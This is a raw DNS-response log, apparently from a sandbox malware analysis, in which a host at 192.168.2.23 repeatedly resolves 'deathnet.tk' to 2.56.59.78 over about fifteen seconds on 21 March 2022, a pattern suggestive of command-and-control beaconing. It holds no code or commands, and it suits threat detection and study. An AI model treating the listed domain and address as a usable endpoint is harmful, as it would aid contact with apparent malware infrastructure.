              Mar 21, 2022 20:07:38.857522011 CET8.8.8.8192.168.2.230x4024No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.902903080 CET8.8.8.8192.168.2.230xa188No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.947412014 CET8.8.8.8192.168.2.230x6902No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.990513086 CET8.8.8.8192.168.2.230x7f77No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.033900023 CET8.8.8.8192.168.2.230x2d4eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.083086967 CET8.8.8.8192.168.2.230x1b54No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.126509905 CET8.8.8.8192.168.2.230xc93cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.170783997 CET8.8.8.8192.168.2.230x94fbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.213723898 CET8.8.8.8192.168.2.230xfcfaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.259563923 CET8.8.8.8192.168.2.230x7a2eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.312067032 CET8.8.8.8192.168.2.230x5890No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.361273050 CET8.8.8.8192.168.2.230xa1f1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.407982111 CET8.8.8.8192.168.2.230xb968No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.453299046 CET8.8.8.8192.168.2.230x42ceNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.501307964 CET8.8.8.8192.168.2.230xa78bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.549449921 CET8.8.8.8192.168.2.230x92dcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.596123934 CET8.8.8.8192.168.2.230xc82No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.648334980 CET8.8.8.8192.168.2.230x1623No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.694250107 CET8.8.8.8192.168.2.230xac48No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.742862940 CET8.8.8.8192.168.2.230x4156No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.789370060 CET8.8.8.8192.168.2.230xdbc3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.835985899 CET8.8.8.8192.168.2.230xda41No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.881812096 CET8.8.8.8192.168.2.230x4a45No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.931956053 CET8.8.8.8192.168.2.230xfdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:39.981373072 CET8.8.8.8192.168.2.230x9e4dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:40.033343077 CET8.8.8.8192.168.2.230xae73No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.087830067 CET8.8.8.8192.168.2.230x56efNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.131370068 CET8.8.8.8192.168.2.230x50c0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.175856113 CET8.8.8.8192.168.2.230x3c0eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.220719099 CET8.8.8.8192.168.2.230xa19No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.266552925 CET8.8.8.8192.168.2.230x66baNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.312648058 CET8.8.8.8192.168.2.230xd850No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.356256008 CET8.8.8.8192.168.2.230xb302No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.401364088 CET8.8.8.8192.168.2.230x4c31No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.444294930 CET8.8.8.8192.168.2.230x810dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.489104986 CET8.8.8.8192.168.2.230xb9b5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.532869101 CET8.8.8.8192.168.2.230x1ce3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.578399897 CET8.8.8.8192.168.2.230xaf1fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.631315947 CET8.8.8.8192.168.2.230x800cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.677352905 CET8.8.8.8192.168.2.230xe562No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.725965977 CET8.8.8.8192.168.2.230x4872No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.771248102 CET8.8.8.8192.168.2.230xb33eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.816174030 CET8.8.8.8192.168.2.230x5f69No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.864157915 CET8.8.8.8192.168.2.230x847No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.909878969 CET8.8.8.8192.168.2.230x2339No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.954544067 CET8.8.8.8192.168.2.230x66eeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:45.998909950 CET8.8.8.8192.168.2.230xa850No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.044009924 CET8.8.8.8192.168.2.230x2ea0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.089960098 CET8.8.8.8192.168.2.230x3452No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.135129929 CET8.8.8.8192.168.2.230xe378No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.183542013 CET8.8.8.8192.168.2.230x50a8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.226444960 CET8.8.8.8192.168.2.230xf5afNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.269906044 CET8.8.8.8192.168.2.230x2596No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.316443920 CET8.8.8.8192.168.2.230x9279No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.362118959 CET8.8.8.8192.168.2.230xfd70No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.405585051 CET8.8.8.8192.168.2.230x4fb1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.450238943 CET8.8.8.8192.168.2.230xc75cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.495357990 CET8.8.8.8192.168.2.230xa814No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.543174028 CET8.8.8.8192.168.2.230x54dfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.586913109 CET8.8.8.8192.168.2.230xd736No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.631520987 CET8.8.8.8192.168.2.230xd7d2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.675278902 CET8.8.8.8192.168.2.230x95c7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.726638079 CET8.8.8.8192.168.2.230xd5e3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.769361019 CET8.8.8.8192.168.2.230x9e65No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.814914942 CET8.8.8.8192.168.2.230x32a1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.859878063 CET8.8.8.8192.168.2.230xd791No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.906121016 CET8.8.8.8192.168.2.230x5abfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.948771000 CET8.8.8.8192.168.2.230x87ffNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:46.992238998 CET8.8.8.8192.168.2.230xbdccNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.039685011 CET8.8.8.8192.168.2.230xa6cbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.085972071 CET8.8.8.8192.168.2.230xcc3bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.132152081 CET8.8.8.8192.168.2.230xaa66No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.175381899 CET8.8.8.8192.168.2.230x65f8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.220350981 CET8.8.8.8192.168.2.230x24ecNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.265074968 CET8.8.8.8192.168.2.230xcb86No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.308343887 CET8.8.8.8192.168.2.230x565eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.351758003 CET8.8.8.8192.168.2.230x5baaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.394537926 CET8.8.8.8192.168.2.230xbbc3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.438112020 CET8.8.8.8192.168.2.230xc19dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.484424114 CET8.8.8.8192.168.2.230x4f8fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.528150082 CET8.8.8.8192.168.2.230xc49cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.573050022 CET8.8.8.8192.168.2.230x2f3dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.622426033 CET8.8.8.8192.168.2.230xeee5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.667155027 CET8.8.8.8192.168.2.230x18ffNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.714745998 CET8.8.8.8192.168.2.230x5d5fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.768326044 CET8.8.8.8192.168.2.230xd2f4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.813886881 CET8.8.8.8192.168.2.230x792bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.866838932 CET8.8.8.8192.168.2.230xc743No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.924196959 CET8.8.8.8192.168.2.230xb18No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:47.979079962 CET8.8.8.8192.168.2.230x2dbfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.024013996 CET8.8.8.8192.168.2.230xb0ddNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.070839882 CET8.8.8.8192.168.2.230x6f20No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.113365889 CET8.8.8.8192.168.2.230x73b9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.159260988 CET8.8.8.8192.168.2.230x9ecbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.207300901 CET8.8.8.8192.168.2.230x5ae2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.252553940 CET8.8.8.8192.168.2.230x760aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.295717001 CET8.8.8.8192.168.2.230xbd40No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.341871977 CET8.8.8.8192.168.2.230xe0d2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.387558937 CET8.8.8.8192.168.2.230xc796No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.430922985 CET8.8.8.8192.168.2.230x1d31No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.477142096 CET8.8.8.8192.168.2.230xee7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.522834063 CET8.8.8.8192.168.2.230xad89No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.566634893 CET8.8.8.8192.168.2.230xcedcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.610157013 CET8.8.8.8192.168.2.230xc86fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.655906916 CET8.8.8.8192.168.2.230xd6ebNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.699451923 CET8.8.8.8192.168.2.230xa1deNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.744587898 CET8.8.8.8192.168.2.230x6172No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.787662983 CET8.8.8.8192.168.2.230xbd9fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.831322908 CET8.8.8.8192.168.2.230xc4bdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.876533031 CET8.8.8.8192.168.2.230xcba2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.919766903 CET8.8.8.8192.168.2.230x17e1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:48.965553045 CET8.8.8.8192.168.2.230xea80No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.010060072 CET8.8.8.8192.168.2.230x9a0dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.055032015 CET8.8.8.8192.168.2.230x6adaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.098599911 CET8.8.8.8192.168.2.230x7f43No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.141705036 CET8.8.8.8192.168.2.230xebd3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.187446117 CET8.8.8.8192.168.2.230xf0daNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.232160091 CET8.8.8.8192.168.2.230x9c90No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.277429104 CET8.8.8.8192.168.2.230x381aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.321897030 CET8.8.8.8192.168.2.230x9e61No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.367093086 CET8.8.8.8192.168.2.230xbbd5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.411664009 CET8.8.8.8192.168.2.230xcc6eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.455159903 CET8.8.8.8192.168.2.230x81fbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.501101017 CET8.8.8.8192.168.2.230xe5bfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.544914961 CET8.8.8.8192.168.2.230xde9bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.588449001 CET8.8.8.8192.168.2.230x704aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.633534908 CET8.8.8.8192.168.2.230xca12No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.679598093 CET8.8.8.8192.168.2.230x2238No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.722820997 CET8.8.8.8192.168.2.230x4ed6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.774859905 CET8.8.8.8192.168.2.230x64f0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.819149971 CET8.8.8.8192.168.2.230xfe34No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.864533901 CET8.8.8.8192.168.2.230x4ad8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.910253048 CET8.8.8.8192.168.2.230x6aafNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:49.953876972 CET8.8.8.8192.168.2.230x3af0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.000907898 CET8.8.8.8192.168.2.230x88b6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.045494080 CET8.8.8.8192.168.2.230x9759No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.092612982 CET8.8.8.8192.168.2.230xc0b6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.137166977 CET8.8.8.8192.168.2.230xbcd7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.182739973 CET8.8.8.8192.168.2.230x6779No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.232292891 CET8.8.8.8192.168.2.230x54dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.277591944 CET8.8.8.8192.168.2.230xb560No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.322779894 CET8.8.8.8192.168.2.230x2128No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.369813919 CET8.8.8.8192.168.2.230x5151No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.414469004 CET8.8.8.8192.168.2.230xca5fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.458159924 CET8.8.8.8192.168.2.230x8351No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.504017115 CET8.8.8.8192.168.2.230x9927No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.547314882 CET8.8.8.8192.168.2.230xc1b8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.592703104 CET8.8.8.8192.168.2.230x4e34No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.638391018 CET8.8.8.8192.168.2.230x88a4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.683707952 CET8.8.8.8192.168.2.230xda96No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:50.728974104 CET8.8.8.8192.168.2.230x291No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:51.792484999 CET8.8.8.8192.168.2.230x373eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:51.836124897 CET8.8.8.8192.168.2.230xde86No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:51.881784916 CET8.8.8.8192.168.2.230xa62dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:51.927449942 CET8.8.8.8192.168.2.230xf4beNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:51.971240044 CET8.8.8.8192.168.2.230x7e26No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.017569065 CET8.8.8.8192.168.2.230x9757No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.065047979 CET8.8.8.8192.168.2.230x9232No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.113900900 CET8.8.8.8192.168.2.230x51e1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.160100937 CET8.8.8.8192.168.2.230x813cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.203265905 CET8.8.8.8192.168.2.230x9455No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.249634027 CET8.8.8.8192.168.2.230xf746No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.302376986 CET8.8.8.8192.168.2.230x651aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.350390911 CET8.8.8.8192.168.2.230xc7dfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.398391962 CET8.8.8.8192.168.2.230x8018No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.445561886 CET8.8.8.8192.168.2.230x2b9dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.488873005 CET8.8.8.8192.168.2.230x1f56No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.533634901 CET8.8.8.8192.168.2.230xba11No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.579973936 CET8.8.8.8192.168.2.230xe021No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.627085924 CET8.8.8.8192.168.2.230x5ab9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.673847914 CET8.8.8.8192.168.2.230xa679No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.717664957 CET8.8.8.8192.168.2.230xe979No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.766098022 CET8.8.8.8192.168.2.230x20a9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.818459034 CET8.8.8.8192.168.2.230xddb4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.862313986 CET8.8.8.8192.168.2.230x932cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.914427042 CET8.8.8.8192.168.2.230x8027No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:52.962457895 CET8.8.8.8192.168.2.230xc705No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.012789965 CET8.8.8.8192.168.2.230xe512No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.060451984 CET8.8.8.8192.168.2.230x9dbeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.108539104 CET8.8.8.8192.168.2.230xef36No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.158508062 CET8.8.8.8192.168.2.230xade7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.210293055 CET8.8.8.8192.168.2.230x3c51No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.258446932 CET8.8.8.8192.168.2.230x9b18No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.304203033 CET8.8.8.8192.168.2.230xe794No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.348630905 CET8.8.8.8192.168.2.230x6e21No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.392520905 CET8.8.8.8192.168.2.230x807dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.435794115 CET8.8.8.8192.168.2.230x49c5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.480997086 CET8.8.8.8192.168.2.230xd3ceNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.526535034 CET8.8.8.8192.168.2.230x3fbeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.570846081 CET8.8.8.8192.168.2.230x23eaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.616322041 CET8.8.8.8192.168.2.230xf8eaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.659708977 CET8.8.8.8192.168.2.230xcc15No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.706125021 CET8.8.8.8192.168.2.230xcae0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.751070976 CET8.8.8.8192.168.2.230x9e34No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.802556038 CET8.8.8.8192.168.2.230x5bf8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.850287914 CET8.8.8.8192.168.2.230xd354No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.895756960 CET8.8.8.8192.168.2.230xbfb3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.940593004 CET8.8.8.8192.168.2.230xfd56No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:53.985589027 CET8.8.8.8192.168.2.230xa220No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
